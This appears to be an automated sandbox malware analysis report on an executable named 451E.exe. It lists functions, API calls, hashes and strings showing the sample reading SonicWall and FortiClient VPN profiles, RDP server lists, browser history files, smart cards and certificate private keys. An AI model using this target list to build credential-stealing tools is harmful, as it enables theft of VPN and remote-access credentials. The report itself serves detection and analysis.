Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 007604FE Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0076054F

Memory Dump Source

Source File: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_75d000_vejhhuh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 0bdf50cd28fc049821dca196dc00898c5946f6752f1fbdfd6609c1825ff51032
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 71113C79A00208EFDB01DF98C985E99BBF5AF08350F058094F9499B362D375EA50DF80

Function 00419A40 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00515FEC,0041A04B), ref: 00419A48

Memory Dump Source

Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction ID: cdbbb9e7b83af8b631a1fc3647d71b0b27ee278e0583f88c42ef53277000976a
Opcode Fuzzy Hash: 9ec18e11195fab8466a21664cf9d2760616124b952149bfa647060a6f0581e67
Instruction Fuzzy Hash: 26B092B8502600DBD2408B60EC48F953A68E398202F009260FA0085160E7700805AA10

Non-executed Functions

Function 00419CD0 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00419D04
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00419D1F
HeapDestroy.KERNEL32(00000000), ref: 00419D3E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00419D4D

Memory Dump Source

Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction ID: 6966600bf98115fc682df4bae7263d4ee42c52adae4737bd1ec5881763e77970
Opcode Fuzzy Hash: 10b99885ae077d5513f7b4f4fe7ada249d912d148d05b578c42a7b65b8aafc25
Instruction Fuzzy Hash: B9018474600204DBE750EB64FC59BDA77A8E71C306F408176FA4996290EB745DC8CBD9

Function 00419C50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

BuildCommDCBW.KERNEL32(00000000,?), ref: 00419C64
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419C76

Strings

-, xrefs: 00419CAF

Memory Dump Source

Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd

Similarity

API ID: BuildCommEnvironmentFreeStrings
String ID: -
API String ID: 2991353152-2547889144
Opcode ID: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction ID: eedbb3df8d483a19463c8038d1f41fe70976e2133a91f77c3139b26c4217ee6d
Opcode Fuzzy Hash: f4b958283a58c4c84f181a912c03a312a762f8a4ec0123b7dccd55bff0bc5cba
Instruction Fuzzy Hash: 12F02231844204A6DB209FA8DD907EF7BE8E709320F20022AE98467381E3380D86D7DA

Analysis Process: 451E.exePID: 6696, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	31.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	37.4%
Total number of Nodes:	882
Total number of Limit Nodes:	19

Executed Functions

Function 00007FF763AFDC20 Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathCombineW.SHLWAPI ref: 00007FF763AFDDA2
PathFileExistsW.SHLWAPI ref: 00007FF763AFDDAC
PathQuoteSpacesW.SHLWAPI ref: 00007FF763AFDDBE
lstrcatW.KERNEL32 ref: 00007FF763AFDDD7
GetEnvironmentVariableW.KERNEL32 ref: 00007FF763AFDF64
PathAppendW.SHLWAPI ref: 00007FF763AFDF93
PathFileExistsW.SHLWAPI ref: 00007FF763AFDFA0
CreateFileW.KERNEL32 ref: 00007FF763AFDFD0
GetFileSize.KERNEL32 ref: 00007FF763AFDFE8
ReadFile.KERNEL32 ref: 00007FF763AFE010

Part of subcall function 00007FF763AFCF34: lstrlenA.KERNEL32 ref: 00007FF763AFCF47

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

GetEnvironmentVariableW.KERNEL32 ref: 00007FF763AFE28D
PathAppendW.SHLWAPI ref: 00007FF763AFE2B6
PathFileExistsW.SHLWAPI ref: 00007FF763AFE2C3
CreateFileW.KERNEL32 ref: 00007FF763AFE2F3
GetFileSize.KERNEL32 ref: 00007FF763AFE30B

Part of subcall function 00007FF763AF2588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF763AFCD61), ref: 00007FF763AF2595

ReadFile.KERNEL32 ref: 00007FF763AFE337

Strings

</DefaultGroup>, xrefs: 00007FF763AFE195
<DefaultHostName>, xrefs: 00007FF763AFE0DA
Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF763AFDEF7
</DefaultUser>, xrefs: 00007FF763AFE06D
Software\SonicWall\SSL-VPN NetExtender\Standalone, xrefs: 00007FF763AFDD71
", "host": ", xrefs: 00007FF763AFE0BC
<DefaultUser>, xrefs: 00007FF763AFE041
<DefaultGroup>, xrefs: 00007FF763AFE16E
Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF763AFDCD2
", "group": ", xrefs: 00007FF763AFE150
Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF763AFE22B
"user": ", xrefs: 00007FF763AFE032
}},, xrefs: 00007FF763AFE1FB
]},, xrefs: 00007FF763AFE24B
</DefaultHostName>, xrefs: 00007FF763AFE101

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
API String ID: 2508640211-1951492331
Opcode ID: 3dab4bb89e52ac56b1afccd30bff1bf4046f419fe15edfd2c7799a845a73dea7
Instruction ID: 31f06540f14cd6945dd8d2cdb2d01952d2da6e8335f55ed3e67fe0199275f307
Opcode Fuzzy Hash: 3dab4bb89e52ac56b1afccd30bff1bf4046f419fe15edfd2c7799a845a73dea7
Instruction Fuzzy Hash: 2812D551A18642C5EA90FB22D450AFDE351AF857C4FC8413AF94E6B79AEF3CD509D320

Function 00007FF763AFFB4C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF763AFFB7D
lstrcatW.KERNEL32 ref: 00007FF763AFFB8A
lstrcpyW.KERNEL32 ref: 00007FF763AFFB9B
lstrcatW.KERNEL32 ref: 00007FF763AFFBAF
FindFirstFileW.KERNEL32 ref: 00007FF763AFFBC3
lstrcatW.KERNEL32 ref: 00007FF763AFFBE1
lstrcatW.KERNEL32 ref: 00007FF763AFFBF2
FindClose.KERNEL32 ref: 00007FF763AFFBFB

Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF76
Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF92
Part of subcall function 00007FF763AFFF50: WideCharToMultiByte.KERNEL32 ref: 00007FF763AFFFBB
Part of subcall function 00007FF763AFFF50: PathFileExistsA.SHLWAPI ref: 00007FF763AFFFC4
Part of subcall function 00007FF763AFFF50: OpenFile.KERNEL32 ref: 00007FF763AFFFDD
Part of subcall function 00007FF763AFFF50: GetFileSize.KERNEL32 ref: 00007FF763AFFFFD
Part of subcall function 00007FF763AFFF50: CreateFileMappingA.KERNEL32 ref: 00007FF763B00034
Part of subcall function 00007FF763AFFF50: MapViewOfFile.KERNEL32 ref: 00007FF763B00055
Part of subcall function 00007FF763AFFF50: __memcpy.DELAYIMP ref: 00007FF763B00067
Part of subcall function 00007FF763AFFF50: UnmapViewOfFile.KERNEL32 ref: 00007FF763B00072
Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B0007B
Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B00084

Part of subcall function 00007FF763AFF294: __memcpy.DELAYIMP ref: 00007FF763AFF2B2

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

Strings

APPDATA, xrefs: 00007FF763AFFB76
*.default-release, xrefs: 00007FF763AFFBA1
\places.sqlite, xrefs: 00007FF763AFFBE7

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
String ID: *.default-release$APPDATA$\places.sqlite
API String ID: 4154822446-3438982840
Opcode ID: ab9af763abc7d4980dca85413c9ca4f9eaa0fae7f7f21b43bcf5c8f526f7cc92
Instruction ID: 774eee45654627bb7f3f57f77c2214f23db791a5a9bcb1bdb9147cba98ca7dad
Opcode Fuzzy Hash: ab9af763abc7d4980dca85413c9ca4f9eaa0fae7f7f21b43bcf5c8f526f7cc92
Instruction Fuzzy Hash: 2C318521B18947D1EB54EF10E8409E8A361FB48798FC44136E99D5B7A8EF7CD609C750

Function 00007FF763AFFC84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE ref: 00007FF763AFFC9D
CoCreateInstance.COMBASE ref: 00007FF763AFFCC0
CoUninitialize.OLE32 ref: 00007FF763AFFDD7

Strings

http, xrefs: 00007FF763AFFD82

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: http
API String ID: 948891078-2541227442
Opcode ID: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
Instruction ID: a2fbea1789b893571f669253452cc060a097445c0395455ae41b034c5346ff15
Opcode Fuzzy Hash: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
Instruction Fuzzy Hash: 28417132609A46D5E750AF71D484BEDA3A0EB44B8CF88413AEA4D5BB68DF3CD145D310

Function 00007FF763AFB43C Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SCardGetStatusChangeW.WINSCARD ref: 00007FF763AFB553
SCardListCardsW.WINSCARD ref: 00007FF763AFB5FB
SCardFreeMemory.WINSCARD ref: 00007FF763AFB692
SCardListCardsW.WINSCARD ref: 00007FF763AFB7BA
SCardFreeMemory.WINSCARD ref: 00007FF763AFB84F

Strings

%02X, xrefs: 00007FF763AFB59F
"_": "", xrefs: 00007FF763AFB46A

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Card$CardsFreeListMemory$ChangeStatus
String ID: "_": ""$%02X
API String ID: 2879528921-1880646522
Opcode ID: 8ec0c6864f41985d24004ca6e018bc4ddce3b9f89499130afec725e7e5dd47f0
Instruction ID: 2ee9b5b78f3a8a8f7fe87b9bb086f9e30f6070a9475737b6819b2c820edb59db
Opcode Fuzzy Hash: 8ec0c6864f41985d24004ca6e018bc4ddce3b9f89499130afec725e7e5dd47f0
Instruction Fuzzy Hash: ECD16C66A08603C4EA84FB6298918F893659F457C4BCC613AFD5F2B796EE3CE105D360

Function 00007FF763AF9AC8 Relevance: 4.4, Strings: 3, Instructions: 664COMMON

Download Yara Rule

Strings

?: ', xrefs: 00007FF763AFA3F6
's)s, xrefs: 00007FF763AF9B11
sDs, xrefs: 00007FF763AF9B1B

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID:
String ID: sDs$'s)s$?: '
API String ID: 0-2673205255
Opcode ID: b14ef486a98a8d0c38595ec468a9212c7fdf5917905d1a0f68a1baa755f503dd
Instruction ID: 4982e9e953399e4c745b3f65d01d88cec7067bb0930e3c2ec06eed09b36d36e4
Opcode Fuzzy Hash: b14ef486a98a8d0c38595ec468a9212c7fdf5917905d1a0f68a1baa755f503dd
Instruction Fuzzy Hash: EC5283A1B05781C9EB80EFB1C4159FDA7625B467C8BC8503AEE4E3BB8ADE3C9105D750

Function 00007FF763AF2654 Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1951,?,?,00000000,00007FF763AF19BA), ref: 00007FF763AF2669
RtlReAllocateHeap.NTDLL(?,?,?,00007FF763AF1951,?,?,00000000,00007FF763AF19BA), ref: 00007FF763AF267A

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
Instruction ID: ceef8ac31b1d5634e3be52ca727f2f93cbabdc1ac306ba90e9cf776edd1d31cb
Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
Instruction Fuzzy Hash: B2E08619B095C2C1E9CCAB93F9508759121AF4CFC4F8C8035FD4E1B755CE2CD4419610

Function 00007FF763AFFF50 Relevance: 18.1, APIs: 12, Instructions: 91
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32 ref: 00007FF763AFFF76

Part of subcall function 00007FF763AF2588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF763AFCD61), ref: 00007FF763AF2595

lstrlenW.KERNEL32 ref: 00007FF763AFFF92
WideCharToMultiByte.KERNEL32 ref: 00007FF763AFFFBB
PathFileExistsA.SHLWAPI ref: 00007FF763AFFFC4
OpenFile.KERNEL32 ref: 00007FF763AFFFDD

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

GetFileSize.KERNEL32 ref: 00007FF763AFFFFD

Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5

CreateFileMappingA.KERNEL32 ref: 00007FF763B00034
MapViewOfFile.KERNEL32 ref: 00007FF763B00055
__memcpy.DELAYIMP ref: 00007FF763B00067
UnmapViewOfFile.KERNEL32 ref: 00007FF763B00072
CloseHandle.KERNEL32 ref: 00007FF763B0007B
CloseHandle.KERNEL32 ref: 00007FF763B00084

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
String ID:
API String ID: 2161876737-0
Opcode ID: 96e8810ecda21be75596d0931c85d720090f045c31f21a3095ee75ac6c5b0b09
Instruction ID: 6e2a9738da6aa6d119d67b6170a4bfe2f0f02a9fb0177d16e4370516ccd25aa4
Opcode Fuzzy Hash: 96e8810ecda21be75596d0931c85d720090f045c31f21a3095ee75ac6c5b0b09
Instruction Fuzzy Hash: 2D31B425A08642C2E7A8EF22A914B39A290FB8DBD4F884234DDDD1BB94EF3CD405C710

Function 00007FF763AF2D5C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 253
encryptiontimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF763AF2D90
CertGetNameStringW.CRYPT32 ref: 00007FF763AF2DD3
CertNameToStrW.CRYPT32 ref: 00007FF763AF2EB8
CertNameToStrW.CRYPT32 ref: 00007FF763AF2F0A
FileTimeToSystemTime.KERNEL32 ref: 00007FF763AF2F4B
FileTimeToSystemTime.KERNEL32 ref: 00007FF763AF2FC1

Part of subcall function 00007FF763AF1A70: wvsprintfW.USER32 ref: 00007FF763AF1AA9

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

CertEnumCertificatesInStore.CRYPT32 ref: 00007FF763AF3178

Part of subcall function 00007FF763AF3220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF325E
Part of subcall function 00007FF763AF3220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF763AF328D
Part of subcall function 00007FF763AF3220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF32BB
Part of subcall function 00007FF763AF3220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3336
Part of subcall function 00007FF763AF3220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3380
Part of subcall function 00007FF763AF3220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF33AC

Strings

1.2.840.113549, xrefs: 00007FF763AF305F, 00007FF763AF306F

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
String ID: 1.2.840.113549
API String ID: 2787208766-3888290641
Opcode ID: 89e321d8f47db721faaaffbf5bc670e81a38216f7234dbe265e61ac78cf82268
Instruction ID: 8f349b0b7daeaeae467e420d1291669f95facaacea8587b4971b17b806240ad7
Opcode Fuzzy Hash: 89e321d8f47db721faaaffbf5bc670e81a38216f7234dbe265e61ac78cf82268
Instruction Fuzzy Hash: 8AB1A566A08682C5EB94AF52D440ABEE761FB84BC4F840036FE8D27B59DF3CD104DB50

Function 00007FF763AFF99C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF763AFFA70
lstrcatW.KERNEL32 ref: 00007FF763AFFA80
lstrcatW.KERNEL32 ref: 00007FF763AFFA90
lstrcatW.KERNEL32 ref: 00007FF763AFFAA4

Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF76
Part of subcall function 00007FF763AFFF50: lstrlenW.KERNEL32 ref: 00007FF763AFFF92
Part of subcall function 00007FF763AFFF50: WideCharToMultiByte.KERNEL32 ref: 00007FF763AFFFBB
Part of subcall function 00007FF763AFFF50: PathFileExistsA.SHLWAPI ref: 00007FF763AFFFC4
Part of subcall function 00007FF763AFFF50: OpenFile.KERNEL32 ref: 00007FF763AFFFDD
Part of subcall function 00007FF763AFFF50: GetFileSize.KERNEL32 ref: 00007FF763AFFFFD
Part of subcall function 00007FF763AFFF50: CreateFileMappingA.KERNEL32 ref: 00007FF763B00034
Part of subcall function 00007FF763AFFF50: MapViewOfFile.KERNEL32 ref: 00007FF763B00055
Part of subcall function 00007FF763AFFF50: __memcpy.DELAYIMP ref: 00007FF763B00067
Part of subcall function 00007FF763AFFF50: UnmapViewOfFile.KERNEL32 ref: 00007FF763B00072
Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B0007B
Part of subcall function 00007FF763AFFF50: CloseHandle.KERNEL32 ref: 00007FF763B00084

Part of subcall function 00007FF763AFF294: __memcpy.DELAYIMP ref: 00007FF763AFF2B2

Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF

lstrlenW.KERNEL32 ref: 00007FF763AFFB13

Strings

LOCALAPPDATA, xrefs: 00007FF763AFFA69
Default, xrefs: 00007FF763AFF9BE
\History, xrefs: 00007FF763AFFA96

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd

Similarity

API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
String ID: Default$LOCALAPPDATA$\History
API String ID: 3980575106-3555721359
Opcode ID: 703e2cc27491edb835a702928f8dfd056178b35cb6f4e48980e21a2681ef37d9
Instruction ID: 11e611d777e39210488ae762b8573f0556b25fae798e08d9e00a0910ca6f06ea
Opcode Fuzzy Hash: 703e2cc27491edb835a702928f8dfd056178b35cb6f4e48980e21a2681ef37d9
Instruction Fuzzy Hash: 4E515622E18F85C2D751EF24D5416A87370F798788F45A226DB8D67366EF34E2C8C340

Function 00007FF763AF900C Relevance: 13.6, APIs: 9, Instructions: 137
pipeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreatePipe.KERNEL32 ref: 00007FF763AF905F
GetLastError.KERNEL32 ref: 00007FF763AF907D
CreatePipe.KERNEL32 ref: 00007FF763AF90B7
GetLastError.KERNEL32 ref: 00007FF763AF90D5
CreatePipe.KERNEL32 ref: 00007FF763AF90FC
GetLastError.KERNEL32 ref: 00007FF763AF911A
CreateProcessW.KERNEL32 ref: 00007FF763AF91B7
GetLastError.KERNEL32 ref: 00007FF763AF91DF
CloseHandle.KERNEL32 ref: 00007FF763AF91F9

Memory Dump Source

Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true

